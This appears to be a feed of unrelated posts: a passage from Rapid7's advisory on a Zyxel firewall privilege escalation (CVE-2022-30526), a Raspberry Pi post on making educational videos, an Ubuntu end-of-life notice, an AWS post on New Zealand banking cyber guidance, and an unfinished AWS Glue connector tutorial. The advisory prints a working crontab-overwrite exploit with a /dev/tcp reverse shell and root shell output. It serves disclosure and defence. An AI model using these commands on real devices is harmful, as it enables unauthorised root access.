  • ATP 100, 200, 500, 700, 800
  • VPN 50, 100, 300, 1000

Patching CVE-2022-30525 and removing the firewall administration interface from the internet should significantly reduce the risk of this vulnerability being exploited.

Product Description

The affected firewalls are advertised for both small branch and corporate headquarters deployments. They offer VPN solutions, SSL inspection, web filtering, intrusion protection, and email security, and they advertise up to 5 Gbps of throughput through the firewall.

CVE-2022-30526: Local Privilege Escalation

In our previous disclosure of CVE-2022-30525, we demonstrated an attack that allowed a remote and unauthenticated attacker to execute commands as nobody. CVE-2022-30526 allows nobody to become root. This is achieved using a suid binary named zysudo.suid.

bash-5.1$ zysudo.suid
zysudo.suid
Usage: zysudo.suid <command> <arg1> <arg2> ...
	The maximum number of argument is 16

zysudo.suid allows a low privileged user to execute an allow-list of commands with root privileges. The allow list is fairly long:

/sbin/iptables -L
/sbin/ip6tables -L
/sbin/ipset -L
/bin/touch
/bin/rm -f
/bin/rm
/usr/bin/zip
/bin/mv
/bin/chmod 777 /tmp
/bin/cat
/bin/echo
/sbin/sysctl
/bin/dmesg
/usr/bin/killall -q -USR1 diagnosed
/usr/bin/killall -q -USR2 diagnosed
/usr/bin/killall -q -SYS diagnosed
/usr/bin/killall -9 resd
/usr/bin/killall -SIGUSR2 zyshd_wd
/bin/kill -0
/usr/bin/gdb
/bin/ls
/usr/bin/pmap
/bin/cp
/bin/chown
/bin/mkdir
/usr/local/bridge-util/brctl show
/bin/ping
/usr/sbin/ping6
/usr/sbin/sdwan_interface
/usr/bin/timeout 10s /usr/bin/openssl s_client -CAfile /share/ztp/certificate/ca_chain.pem -cert /share/ztp/certificate/edge_certificate.pem -key /share/ztp/certificate/edge_privkey.pem -host
/usr/bin/timeout 10s /usr/bin/openssl s_client -CAfile /share/ztp/certificate/ca_chain_f.pem -cert /share/ztp/certificate/edge_certificate_f.pem -key /share/ztp/certificate/edge_privkey_f.pem -host
/usr/sbin/usmgt m
/usr/sbin/usmgt u
/usr/bin/killall -SIGUSR1 pcap_monitor
/usr/bin/killall -SIGUSR2 pcap_monitor
/usr/local/bin/sdwan_log_backup.sh
/usr/bin/zykit_info -n
/usr/local/bin/speedtest
/usr/local/bin/speedtest-cli

The commands are executed using execv, so command injection isn’t a concern. The problem is that a few of these commands allow low-privileged attackers to overwrite files with arbitrary content. There are some other bad things in here (e.g. rm), but we’ll focus on file writing.

Much of the firewall’s filesystem is read-only squashfs. Simply modifying a binary that will be executed as root in /bin/, /sbin/ and the like isn’t an option. However, there is at least one file that an attacker can modify in order to reliably escalate to root: /var/zyxel/crontab.

/var/zyxel/crontab is the crontab file used by cron. An attacker can simply append a new job to the end of the crontab to get root privileges:

bash-5.1$ cp /var/zyxel/crontab /tmp/crontab
bash-5.1$ echo -en '#!/bin/bash\n\nexec bash -i &>/dev/tcp/10.0.0.28/1270 <&1\n' > /tmp/exec_me
bash-5.1$ chmod +x /tmp/exec_me
bash-5.1$ echo "* * * * * root /tmp/exec_me" >> /tmp/crontab
bash-5.1$ zysudo.suid /bin/cp /tmp/crontab /var/zyxel/crontab

Above the attacker copies the active crontab to /tmp/. Then they use echo to create a new script called /tmp/exec_me. The new script, when executed, will start a reverse shell to 10.0.0.28:1270. Execution of the new script is appended to /tmp/crontab. Then /var/zyxel/crontab is overwritten with the malicious /tmp/crontab using zysudo.suid. cron will execute the appended command as root within the next 60 seconds:

albinolobster@ubuntu:~$ nc -lvnp 1270
Listening on 0.0.0.0 1270
Connection received on 10.0.0.14 36836
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
bash-5.1# id
id
uid=0(root) gid=0(root) groups=0(root)
bash-5.1# uname -a
uname -a
Linux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Mar 15 05:14:51 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/Linux
bash-5.1# 

CVE-2022-30525 Patch Adoption

CVE-2022-30526 is only useful when used with another vulnerability, such as CVE-2022-30525. Rapid7 has been monitoring patch adoption on Shodan since CISA added the vulnerability to their Known Exploited Vulnerabilities Catalog. We are happy to note that patch adoption has continued to rise over time.

Metasploit Module

A Metasploit module has been developed for this vulnerability. The module is best used in conjunction with the previously published Zyxel Firewall ZTP Unauthenticated Command Injection. The following video demonstrates escalation from nobody to root access:



Credit

These issues were discovered by Jake Baines of Rapid7, and they are being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Remediation

Zyxel released a fix for this issue on July 19, 2022. Please see Zyxel’s advisory for detailed patching information.

Disclosure Timeline

April 2022 – Discovered by Jake Baines
April 13, 2022 – Rapid7 discloses to [email protected]. Proposed disclosure date June 14, 2022.
April 14, 2022 – Zyxel acknowledges receipt.
April 20, 2022 – Rapid7 asks for an update and shares delight over “Here is how to pronounce ZyXEL’s name”.
April 21, 2022 – Zyxel acknowledges reproduction of the vulnerabilities.
April 29, 2022 – Zyxel disputes that the LPE is a vulnerability, and instead calls it “a design flaw.”
April 29, 2022 – Rapid7 asks about CVE assignment, guidance on coordinated disclosure, and for the vendor to reconsider their stance on the LPE.
May 9, 2022 – Zyxel indicates fixing the LPE will take time. Asks Rapid7 to hold full disclosure until November.
May 9, 2022 – Rapid7 informs Zyxel of the intent to disclose this issue on June 14, 2022.
May 10, 2022 – Zyxel acknowledges and plans to coordinate. Assigns CVE-2022-30526.
May 11, 2022 – Rapid7 reaffirms plan to wait until June 14.
May 12, 2022 – Zyxel catches accidental mentions of LPE in planned disclosure for CVE-2022-30525.
May 12, 2022 – Rapid7 removes the reference.
May 23, 2022 – Zyxel says they are pushing disclosure for CVE-2022-30526 out to July 19.
May 23, 2022 – Rapid7 agrees to July 19 disclosure date.
July 19, 2022 – Zyxel publishes their advisory.
July 19, 2022 – Rapid7 publishes this advisory.

How to create great educational video content for computing and beyond

Post Syndicated from Michael Conterio original https://www.raspberrypi.org/blog/how-to-create-educational-video-content-computing-computer-science/

Over the past five years, we’ve made lots of online educational video content for our online courses, for our Isaac Computer Science platform for GCSE and A level, and for our remote lessons based on our Teach Computing Curriculum hosted on Oak National Academy.

We have learned a lot from experience and from learner feedback, and we want to share this knowledge with others. We’re also aware there’s always more to learn from people across the computing education community. That’s one reason we’re continually working to broaden the range of educators we work with. Another is that we want all learners to see themselves represented in our educational materials, because everyone belongs in computer science.

RPF staff and the Teach Online participants

To make progress with all these goals, we ran a pilot programme for educators called Teach Online at the end of 2021 and the start of 2022. Through Teach Online, we provided twelve educators with training, opportunities, and financial and material support to help them with creating online educational content, particularly videos.

Over five online sessions and a final in-person day, we trained them in not only the production of educational videos, but also some of the pedagogy behind it. The pilot programme has now finished, and we thought we’d share some of the key points from the sessions with you in the wider community.

Learning to create a great online learning experience

When you learn new skills and knowledge, it’s important to think about how you apply these. For this reason, a useful question you can use throughout the learning process is “Why?”. So as you think about how to create the best online learning experience, ask yourself in different contexts throughout the content design and production:

  • Why am I using this style of video to illustrate this topic?
  • Why am I presenting these ideas in this order?
  • Why am I using this choice of words?

For example, it’s easy to default to creating ‘talking head’ videos featuring one person talking directly to the camera. But you should always ask why: what are the reasons for using a ‘talking head’ style? Instead, or in addition, you can make videos more engaging and support the learning experience by:

  • Turning the video into an interview
  • Adding other camera angles or screencasts to focus on demonstrations
  • Cutting away to B-roll footage (additional video that can provide context or related action, while the voiceover continues) or to still images that help connect a concept to concrete examples
Teach Online participants explored different ways to make their videos engaging

Planning is key

By planning your content carefully instead of jumping into production right away, you can:

  • Better visualise what your video should look like by creating a storyboard
  • Keep learners engaged by deliberately splitting learning up into smaller chunks while still keeping a narrative flow between them
  • Develop your learners’ understanding of key computing concepts by using semantic waves to unpack and repack concepts

The Teach Online participants told us that they particularly enjoyed learning more about planning videos:

“I now understand that a little planning can make the difference between a mediocre online learning experience and a professional-looking valuable learning experience.” – Educator who participated in our Teach Online programme

“Planning the session using a storyboard is so helpful to visualise the actual recording.” – Educator who participated in our Teach Online programme

Storyboards are a great option to plan online learning experiences

Considering equity, diversity, and inclusion

We are committed to making computing and computer science accessible and engaging, so we embed measures to improve equity, diversity, and inclusion throughout our free learning and teaching resources, including the Teach Online programme. It’s important not to leave this aspect of creating educational content as an afterthought: you can only make sure that your content is truly as equitable and inclusive as you can make it if you address this at every stage of your process. As an added bonus, many ways of making your content more accessible not only benefit learners with specific needs, but support and engage all of your audience so everyone can learn more easily.

Best practices that you can use while creating online content include:

Connecting with your learner audience

One of video’s key advantages is the ability to immediately connect with the audience. To help with that, you can try to talk directly to a single viewer, using “you” and “I” rather than “we”. You can also show off your personality in the presentation slides you use and the backgrounds of your videos.

“[I will use my learning from the programme] by adapting teaching and learning to actively engage learners.” – Educator who participated in our Teach Online programme

It’s important to find your own personal presenting style. There is not one perfect way to present, and you should experiment to find how you are best able to communicate with your viewers. How formal or informal will you be? Is your delivery calm or energetic? Whatever you decide, you may want to edit your script to better fit your style. A practical tip for doing this is to read your video scripts aloud while you are writing them to spot any language that feels awkward to you when spoken. 

“It was really great to try the presenting skills, and I learned a lot about my style.” – Educator who participated in our Teach Online programme

A videographer preparing to film a course presenter.

Connecting with each other

Throughout the Teach Online programme, we helped participants create a community with each other. Finding your own community can give you the support that you need to create, and help you continue to develop your knowledge and skills. Working together is great, whether that’s collaborating in person locally or online via, for example, the CAS forums or social media.

“I very much liked the diverse group of educators in this programme, and appreciated everyone sharing their experiences and tips.” – Educator who participated in our Teach Online programme

The Teach Online graduates have told us about the positive impact the programme has had on their teaching in their own contexts. So far we’ve worked with graduates to create Isaac Computer Science videos covering data structures, high- and low-level languages, and string handling.

What do you want to know about creating online educational content?

There is a growing need for online educational content, particularly videos — not only to improve access to education, but also to support in-person teaching. By investing in training educators, we help diversify the pool of people working in this area, improve the confidence of those who would like to start, and provide them with the skills and knowledge to successfully create great content for their learners.

In the future we’d also like to support the wider community of educators with creating online educational content. What resources would you find useful? Share your thoughts in the comments section below.

The post How to create great educational video content for computing and beyond appeared first on Raspberry Pi.

Ubuntu 21.10 is no longer supported

Post Syndicated from original https://lwn.net/Articles/901755/

The Ubuntu 21.10 (“Impish Indri”) release is no longer supported as of
July 14; users who are on that version will want to look into
upgrading soon.

This is a follow-up to the End of Life warning sent earlier to confirm
that as of July 14, 2022, Ubuntu 21.10 is no longer supported. No more
package updates will be accepted to 21.10, and it will be archived to
old-releases.ubuntu.com in the coming weeks.

A pathway to the cloud: Analysis of the Reserve Bank of New Zealand’s Guidance on Cyber Resilience

Post Syndicated from Julian Busic original https://aws.amazon.com/blogs/security/a-pathway-to-the-cloud-analysis-of-the-reserve-bank-of-new-zealands-guidance-on-cyber-resilience/

The Reserve Bank of New Zealand’s (RBNZ’s) Guidance on Cyber Resilience (referred to as “Guidance” in this post) acknowledges the benefits of RBNZ-regulated financial services companies in New Zealand (NZ) moving to the cloud, as long as this transition is managed prudently—in other words, as long as entities understand the risks involved and manage them appropriately. In this blog post, I analyze the RBNZ’s thinking as it developed the Guidance, and how the Guidance creates opportunities for NZ financial services customers to accelerate migration of workloads—including critical systems—to the Amazon Web Services (AWS) Cloud.

On page 14 of its Guidance, the RBNZ writes that “[i]f used prudently, third-party services may reduce an entity’s cyber risk, especially for those entities that lack cyber expertise.” This open regulatory stance towards the cloud enables our NZ financial services customers to consider a cloud first strategy for both new and existing systems, including critical workloads. Customers must, however, manage the transition to the cloud prudently, working closely with both their cloud service provider and their regulators.

This blog post is aimed at boards, management, and technology decision-makers, for whom understanding regulatory thinking is a useful input when developing an enterprise cloud strategy.

Operational technology staff and risk practitioners seeking detailed guidance on how AWS helps you align with the RBNZ’s Guidance can download our New Zealand Financial Services whitepaper from our public website and the AWS Reserve Bank of New Zealand Guidance on Cyber Resilience (RBNZ-GCR) Workbook from AWS Artifact, a self-service portal for you to access AWS compliance reports.

Overview and applicability

The RBNZ’s Guidance sets out the RBNZ’s expectations for management of cyber resilience. It’s aimed at all registered banks, licensed non-bank deposit takers, licensed insurers, and designated financial market infrastructures that are regulated by the RBNZ. The Guidance makes a series of non-binding recommendations across four domains—Governance, Capability Building, Information Sharing, and Third-Party Management.

Each section of the Guidance has a short preamble, summarizing the RBNZ’s expectations for effective risk management in each domain and providing insights into why the RBNZ is making specific recommendations.

The Guidance can be tailored to an entity’s individual needs, technology choices, and risk appetite. Boards, management, and technology decision-makers should familiarize themselves with the RBNZ’s Guidance, ascertain how closely their own organization aligns to it, and work to remediate any identified gaps.

Why non-binding guidance and not an enforceable standard?

The RBNZ gives several reasons (see RBNZ Summary of submissions, paragraphs 9-16) for choosing to publish non-binding recommendations rather than legally binding requirements. The RBNZ declares an intent to monitor adoption of its recommendations by industry, and indicates that future policy settings might include developing legally binding standards for cyber resilience. In this respect, the RBNZ’s approach is similar to that of the Australian Prudential Regulation Authority (APRA), which first issued non-binding guidance on management of IT security risk in 2013, before moving to a legally binding standard in 2019.

The RBNZ gives the following reasons for choosing guidance over a standard:

  • The RBNZ’s policy stance of being moderately active in respect to cyber resilience
  • A previous light-touch approach regarding cyber resilience
  • Providing sufficient time for industry to adjust to new policy settings, given the wide range of maturity within financial services organizations in New Zealand
  • The gap between New Zealand’s and other jurisdictions’ cyber readiness
  • The RBNZ’s current ability to effectively monitor and ensure compliance

The RBNZ indicates that it will “work together with the industry to operationalise the finalised Guidance” (RBNZ Summary of submissions, paragraph 10) and that it is “looking to strengthen [its] cyber resilience expertise in [its] financial stability function” although this will “take time to achieve” (RBNZ Summary of submissions, paragraph 9).

RBNZ-regulated entities should already be self-assessing against the Guidance and working to address gaps as a matter of priority. This is not just because the Guidance could become a legally binding standard in the next 3–5 years, but because the RBNZ has created a practical and flexible framework for the management of cyber risk, which will greatly enhance the NZ financial sector’s resilience to cyber incidents. Non–RBNZ-regulated entities looking for a benchmark to measure themselves against can also use the RBNZ’s Guidance to assess and improve the effectiveness of their own control environments.

Comparing rules-based frameworks and principles-based frameworks

There are two main ways that regulators communicate their risk management expectations to their regulated entities. These are a rules-based approach (sometimes called a compliance-based approach) and a principles-based approach. The RBNZ’s Guidance takes a principles-based approach towards the management of cyber risk.

With a rules-based approach, the regulator takes responsibility for identifying risks and lays out explicit and granular controls that regulated entities are required to implement. A rules-based approach is highly prescriptive, meaning that regulated entities can adopt a checklist approach in meeting their regulators’ requirements. This approach, although it gives certainty to regulated entities regarding the controls they are expected to adopt, can have disadvantages for regulators:

  • Creating and maintaining detailed technical rules can be challenging, given the pace at which technology and the threat environment evolve.
  • Regulators have a diverse population of regulated entities, so a rules-based approach can be inflexible or have blind spots.
  • A rules-based approach doesn’t encourage entities to actively identify and manage their own unique set of risks.

By contrast, a principles-based approach describes a set of desired regulatory or risk-management outcomes, but it isn’t prescriptive in how regulated entities achieve these goals. Regulators act in a vendor- and technology-neutral manner, and regulated entities are expected to interpret regulatory requirements or guidance in the context of their individual business models, technology choices, threat environments, and risk appetites.

Under a principles-based approach, an entity must be able to demonstrate to its regulators’ satisfaction that it both understands the current and emerging risks it faces, and that it is managing these risks appropriately. For example, the principle that entities “[…] should develop and maintain a programme for continuing cyber resilience training for staff at all levels” (Guidance, section A3.3 page 6) gives clear direction, but leaves it up to the entity to decide on the approach to take, and how the entity will demonstrate to the RBNZ that this principle is being met.

A principles-based approach avoids the issues with the rules-based approach that I outlined previously—this approach is significantly longer-lived than a rules-based approach, it moves responsibility for effective risk identification and management from the regulator to the entity (which better understands its own risk profile and appetite), and the framework can be applied to a regulated entity population that varies in size, nature, and complexity.

Freedom to innovate under a principles-based approach

The RBNZ says that its Guidance should be employed in a manner “[…] proportionate to the size, structure and operational environment of an entity, as well as the nature, scope, complexity and risk profile of its products and services” (Guidance, page 2).

You can therefore meet the RBNZ’s Guidance in many different ways, as long as you can demonstrate to the RBNZ that your organization understands the risks it is facing and is managing them appropriately. A principles-based approach creates opportunities for innovation, because there are many different ways to meet a set of regulatory principles.

If you are an NZ financial services customer who also operates in Australia, you might note that the RBNZ’s approach aligns to that of the principal financial services regulator in Australia—the Australian Prudential Regulation Authority (APRA). APRA also takes a principles-based approach to its prudential framework, “avoiding excessive prescription where possible to allow for the diversity of practice according to the size, business activity, and sophistication of the institutions being supervised” (APRA’s objectives, Chapter 1).

A cautious green light to the cloud for New Zealand financial services

“If used prudently, third-party services may reduce an entity’s cyber risk, especially for those entities that lack cyber expertise” (Guidance, page 14).

In my view, this statement represents a (cautious) green light for financial services customers in NZ who wish to migrate systems to the AWS Cloud, although as the RBNZ makes clear, you “should be fully aware of the cyber risk associated with third parties and act appropriately to mitigate that risk” (Guidance, page 14). The RBNZ also requests that for critical functions, entities “[…] should inform the Reserve Bank about their outsourcing of critical functions to cloud service providers early in their decision-making process” (Guidance, Section D8.1, page 17).

The RBNZ defines a critical function as “[a]ny activity, function, process, or service, the loss of which (for even a short period of time) would materially affect the continued operation of an entity, the market it serves and the broader financial system, and/or materially affect the data integrity, reputation of an entity and confidence in the financial system” (Guidance, page 19).

Although the RBNZ doesn’t elaborate further on why it requests early notification about outsourcing of critical functions to the cloud, it’s likely that early engagement is requested so that the RBNZ has the opportunity to provide early feedback on any areas of potential concern, before the initiative is significantly progressed and a large amount of resources are committed.

Migration of higher-risk workloads to the cloud will naturally attract higher levels of regulatory scrutiny, but this doesn’t change the RBNZ’s open regulatory stance on cloud security. This stance is further emphasized by the RBNZ’s comment that “If managed prudently, migrating to the cloud presents a number of benefits including geographically dispersed infrastructures, agility to scale more quickly, improved automation, sufficient redundancy, and reduced initial investment costs for individual financial institutions” (Guidance, page 15).

Building innovative, secure, and highly resilient solutions on AWS, and using the high levels of visibility that you have into your environments that are running on AWS, can help you demonstrate to your regulators how you are identifying and managing your cyber resilience risks in line with the RBNZ’s Guidance.

A note on regulatory myths

In conversations with customers, I occasionally encounter “regulatory myths,” such as “certain types of workloads are prohibited in the cloud,” or “my regulator won’t allow me to use multi-region architectures.”

To date, the RBNZ has not made specific recommendations or set specific requirements regarding technology solutions. This includes, but is not limited to, choice of vendors or technology platforms, prescription of particular architectures, or the types of workload that may or may not be migrated to the cloud. Remember, the RBNZ’s Guidance is a principles-based framework, and is vendor-, technology-, and solution-neutral.

We have many examples of financial services companies all over the world successfully running critical workloads in the AWS Cloud, but regulatory myths and misunderstandings can inhibit our customers’ ability to “think big” when developing their cloud strategies. If you believe that you must implement specific technical patterns to meet regulatory expectations, we encourage you to contact the RBNZ to discuss any aspects of the Guidance that require clarification. We also encourage you to contact your AWS account team, who can arrange support from internal AWS risk and regulatory specialists, particularly if critical systems are proposed for migration to AWS.

Conclusion

The RBNZ’s Guidance on Cyber Resilience is an important first step for financial services regulation of cybersecurity in NZ. The Guidance can be considered cloud friendly because it acknowledges that prudent use of third parties (such as AWS) can reduce cyber risk, especially for entities that lack cyber expertise, and outlines several benefits of the cloud over traditional on-premises infrastructure, including resilience and redundancy, ability to scale, and reduced initial investment costs.

The principles-based nature of the RBNZ’s Guidance creates opportunities for you to develop innovative solutions in the AWS Cloud, because there are many different ways to meet the principles contained in the RBNZ’s Guidance. The key consideration is that you demonstrate to your regulators that you both understand the cyber risks you face in moving to the AWS Cloud, and manage them appropriately.

The launch of the AWS Asia Pacific (Auckland) Region in 2024, our wide range of products and services, and the visibility that you have into the AWS control environment (through AWS Artifact) and your own environment (through services like Amazon GuardDuty and AWS Security Hub) can all help you demonstrate to the RBNZ that you are managing cyber risk in accordance with the RBNZ’s expectations.

Next steps

Boards, executives, and technology decision-makers should familiarize themselves with the RBNZ’s Guidance, and if they aren’t already doing so, conduct a self-assessment and initiate a body of work to address identified gaps.

In view of the RBNZ’s cautious green light for prudent migration to the cloud—including for critical systems—NZ financial services customers should review their existing cloud strategies and identify areas where they can both broaden and accelerate their cloud journeys. The AWS Cloud Adoption Framework (AWS CAF) offers guidance and best practices to help organizations develop an efficient and effective plan for their cloud adoption journey. The AWS C-suite Guide to Shared Responsibility for Cloud Security and Data Safe Cloud eBook inform boards and senior management about both the benefits and risks of operating in the cloud.

Operational technology staff and risk practitioners can download our New Zealand Financial Services whitepaper from our public website and the AWS Reserve Bank of New Zealand Guidance on Cyber Resilience (RBNZ-GCR) Workbook from AWS Artifact. The RBNZ-GCR Workbook is particularly useful for operational IT staff and risk practitioners because it provides prescriptive guidance on which controls to implement on your side of the shared responsibility model and which AWS controls you inherit from the service.

Finally, contact your AWS representative to discuss how the AWS Partner Network, AWS solution architects, AWS Professional Services teams, and AWS Training and Certification can assist with your cloud adoption journey. If you don’t have an AWS representative, contact us at https://aws.amazon.com/contact-us.

 
If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

Want more AWS Security news? Follow us on Twitter.

Author

Julian Busic

Julian is a Security Solutions Architect with a focus on regulatory engagement. He works with our customers, their regulators, and AWS teams to help customers raise the bar on secure cloud adoption and usage. Julian has over 15 years of experience working in risk and technology across the financial services industry in Australia and New Zealand.

Process Apache Hudi, Delta Lake, Apache Iceberg datasets at scale, part 1: AWS Glue Studio Notebook

Post Syndicated from Noritaka Sekiyama original https://aws.amazon.com/blogs/big-data/part-1-integrate-apache-hudi-delta-lake-apache-iceberg-datasets-at-scale-aws-glue-studio-notebook/

Cloud data lakes provide a scalable and low-cost data repository that enables customers to easily store data from a variety of data sources. Data scientists, business analysts, and line of business users leverage data lakes to explore, refine, and analyze petabytes of data. AWS Glue is a serverless data integration service that makes it easy to discover, prepare, and combine data for analytics, machine learning, and application development. Customers use AWS Glue to discover and extract data from a variety of data sources, and to enrich and cleanse the data before storing it in data lakes and data warehouses.

Over the years, many table formats have emerged to support ACID transactions, governance, and catalog use cases. For example, formats such as Apache Hudi, Delta Lake, Apache Iceberg, and AWS Lake Formation governed tables enable customers to run ACID transactions on Amazon Simple Storage Service (Amazon S3). AWS Glue supports these table formats for batch and streaming workloads. This post focuses on Apache Hudi, Delta Lake, and Apache Iceberg, and summarizes how to use them in AWS Glue 3.0 jobs. If you’re interested in AWS Lake Formation governed tables, visit the Effective data lakes using AWS Lake Formation series.

Bring libraries for the data lake formats

Today, there are three options for bringing libraries for these data lake formats onto the AWS Glue job platform: marketplace connectors, custom connectors (bring your own connector, or BYOC), and extra library dependencies.

Marketplace connectors

AWS Glue Connector Marketplace is the centralized repository that catalogs the Glue connectors provided by multiple vendors. As of today, you can subscribe to more than 60 connectors offered in AWS Glue Connector Marketplace, and marketplace connectors are available for Apache Hudi, Delta Lake, and Apache Iceberg. The marketplace connectors are hosted in an Amazon Elastic Container Registry (Amazon ECR) repository and downloaded to the Glue job system at runtime. If you prefer the simple user experience of subscribing to connectors and using them in your Glue ETL jobs, a marketplace connector is a good option.

Custom connectors as bring-your-own-connector (BYOC)

An AWS Glue custom connector enables you to upload and register your own libraries located in Amazon S3 as Glue connectors, giving you more control over library versions, patches, and dependencies. Because the libraries reside in your own S3 bucket, you can configure the S3 bucket policy to share them only with specific users, configure private network access to download them through VPC endpoints, and so on. If you prefer having more control over those configurations, a custom connector (BYOC) is a good option.

Extra library dependencies

There is another option: download the data lake format libraries, upload them to your S3 bucket, and add them as extra library dependencies. With this option, you can add the libraries directly to the job and use them without a connector. In a Glue job, you configure this in the Dependent JARs path field. In the API, it’s the --extra-jars parameter. In a Glue Studio notebook, you configure it with the %extra_jars magic. To download the relevant JAR files, see the library locations in the section Create a Custom connection (BYOC).
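
For illustration, the following is a minimal sketch of setting the --extra-jars parameter when creating a Glue 3.0 job through the API with boto3. The bucket, JAR, role, and script locations are placeholder assumptions, not values from this post.

import boto3

glue = boto3.client("glue")

# Placeholder values: replace the bucket, JAR, role, and script locations with your own
extra_jars = "s3://my-example-bucket/jars/delta-core_2.12-1.0.0.jar"

glue.create_job(
    Name="delta-lake-example-job",
    Role="arn:aws:iam::123456789012:role/MyGlueJobRole",
    GlueVersion="3.0",
    Command={
        "Name": "glueetl",
        "ScriptLocation": "s3://my-example-bucket/scripts/delta_example.py",
        "PythonVersion": "3",
    },
    DefaultArguments={
        # Equivalent to the Dependent JARs path field in the Glue console
        "--extra-jars": extra_jars,
    },
)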

Create a Marketplace connection

To create a new marketplace connection for Apache Hudi, Delta Lake, or Apache Iceberg, complete the following steps.

Apache Hudi 0.10.1

Complete the following steps to create a marketplace connection for Apache Hudi 0.10.1:

  1. Open AWS Glue Studio.
  2. Choose Connectors.
  3. Choose Go to AWS Marketplace.
  4. Search for Apache Hudi Connector for AWS Glue, and choose Apache Hudi Connector for AWS Glue.
  5. Choose Continue to Subscribe.
  6. Review the Terms and conditions, pricing, and other details, and choose the Accept Terms button to continue.
  7. Make sure that the subscription is complete and you see the Effective date populated next to the product, and then choose Continue to Configuration.
  8. For Delivery Method, choose Glue 3.0.
  9. For Software version, choose 0.10.1.
  10. Choose Continue to Launch.
  11. Under Usage instructions, choose Activate the Glue connector in AWS Glue Studio. You’re redirected to AWS Glue Studio.
  12. For Name, enter a name for your connection.
  13. Optionally, choose a VPC, subnet, and security group.
  14. Choose Create connection.

Delta Lake 1.0.0

Complete the following steps to create a marketplace connection for Delta Lake 1.0.0:

  1. Open AWS Glue Studio.
  2. Choose Connectors.
  3. Choose Go to AWS Marketplace.
  4. Search for Delta Lake Connector for AWS Glue, and choose Delta Lake Connector for AWS Glue.
  5. Choose Continue to Subscribe.
  6. Review the Terms and conditions, pricing, and other details, and choose the Accept Terms button to continue.
  7. Make sure that the subscription is complete and you see the Effective date populated next to the product, and then choose Continue to Configuration.
  8. For Delivery Method, choose Glue 3.0.
  9. For Software version, choose 1.0.0-2.
  10. Choose Continue to Launch.
  11. Under Usage instructions, choose Activate the Glue connector in AWS Glue Studio. You’re redirected to AWS Glue Studio.
  12. For Name, enter a name for your connection.
  13. Optionally, choose a VPC, subnet, and security group.
  14. Choose Create connection.

Apache Iceberg 0.12.0

Complete the following steps to create a marketplace connection for Apache Iceberg 0.12.0:

  1. Open AWS Glue Studio.
  2. Choose Connectors.
  3. Choose Go to AWS Marketplace.
  4. Search for Apache Iceberg Connector for AWS Glue, and choose Apache Iceberg Connector for AWS Glue.
  5. Choose Continue to Subscribe.
  6. Review the Terms and conditions, pricing, and other details, and choose the Accept Terms button to continue.
  7. Make sure that the subscription is complete and you see the Effective date populated next to the product, and then choose Continue to Configuration.
  8. For Delivery Method, choose Glue 3.0.
  9. For Software version, choose 0.12.0-2.
  10. Choose Continue to Launch.
  11. Under Usage instructions, choose Activate the Glue connector in AWS Glue Studio. You’re redirected to AWS Glue Studio.
  12. For Name, enter iceberg-0120-mp-connection.
  13. Optionally, choose a VPC, subnet, and security group.
  14. Choose Create connection.

Create a Custom connection (BYOC)

You can create your own custom connectors from JAR files. In this section, you can see the exact JAR files that are used in the marketplace connectors, and you can use those same files to build custom connectors for Apache Hudi, Delta Lake, and Apache Iceberg.

To create a new custom connection for Apache Hudi, Delta Lake, or Apache Iceberg, complete the following steps.

Apache Hudi 0.9.0

Complete the following steps to create a custom connection for Apache Hudi 0.9.0:

  1. Download the following JAR files, and upload them to your S3 bucket.
    1. https://repo1.maven.org/maven2/org/apache/hudi/hudi-spark3-bundle_2.12/0.9.0/hudi-spark3-bundle_2.12-0.9.0.jar
    2. https://repo1.maven.org/maven2/org/apache/hudi/hudi-utilities-bundle_2.12/0.9.0/hudi-utilities-bundle_2.12-0.9.0.jar
    3. https://repo1.maven.org/maven2/org/apache/parquet/parquet-avro/1.10.1/parquet-avro-1.10.1.jar
    4. https://repo1.maven.org/maven2/org/apache/spark/spark-avro_2.12/3.1.1/spark-avro_2.12-3.1.1.jar
    5. https://repo1.maven.org/maven2/org/apache/calcite/calcite-core/1.10.0/calcite-core-1.10.0.jar
    6. https://repo1.maven.org/maven2/org/datanucleus/datanucleus-core/4.1.17/datanucleus-core-4.1.17.jar
    7. https://repo1.maven.org/maven2/org/apache/thrift/libfb303/0.9.3/libfb303-0.9.3.jar
  2. Open AWS Glue Studio.
  3. Choose Connectors.
  4. Choose Create custom connector.
  5. For Connector S3 URL, enter the comma-separated Amazon S3 paths for the above JAR files.
  6. For Name, enter hudi-090-byoc-connector.
  7. For Connector Type, choose Spark.
  8. For Class name, enter org.apache.hudi.
  9. Choose Create connector.
  10. Choose hudi-090-byoc-connector.
  11. Choose Create connection.
  12. For Name, enter hudi-090-byoc-connection.
  13. Optionally, choose a VPC, subnet, and security group.
  14. Choose Create connection.

Apache Hudi 0.10.1

Complete the following steps to create a custom connection for Apache Hudi 0.10.1:

  1. Download the following JAR files, and upload them to your S3 bucket.
    1. hudi-utilities-bundle_2.12-0.10.1.jar
    2. hudi-spark3.1.1-bundle_2.12-0.10.1.jar
    3. spark-avro_2.12-3.1.1.jar
  2. Open AWS Glue Studio.
  3. Choose Connectors.
  4. Choose Create custom connector.
  5. For Connector S3 URL, enter the comma-separated Amazon S3 paths for the above JAR files.
  6. For Name, enter hudi-0101-byoc-connector.
  7. For Connector Type, choose Spark.
  8. For Class name, enter org.apache.hudi.
  9. Choose Create connector.
  10. Choose hudi-0101-byoc-connector.
  11. Choose Create connection.
  12. For Name, enter hudi-0101-byoc-connection.
  13. Optionally, choose a VPC, subnet, and security group.
  14. Choose Create connection.

Note that the above Hudi 0.10.1 installation on Glue 3.0 does not fully support Merge On Read (MoR) tables.

Delta Lake 1.0.0

Complete the following steps to create a custom connector for Delta Lake 1.0.0:

  1. Download the following JAR file, and upload it to your S3 bucket.
    1. https://repo1.maven.org/maven2/io/delta/delta-core_2.12/1.0.0/delta-core_2.12-1.0.0.jar
  2. Open AWS Glue Studio.
  3. Choose Connectors.
  4. Choose Create custom connector.
  5. For Connector S3 URL, enter the Amazon S3 path for the above JAR file.
  6. For Name, enter delta-100-byoc-connector.
  7. For Connector Type, choose Spark.
  8. For Class name, enter org.apache.spark.sql.delta.sources.DeltaDataSource.
  9. Choose Create connector.
  10. Choose delta-100-byoc-connector.
  11. Choose Create connection.
  12. For Name, enter delta-100-byoc-connection.
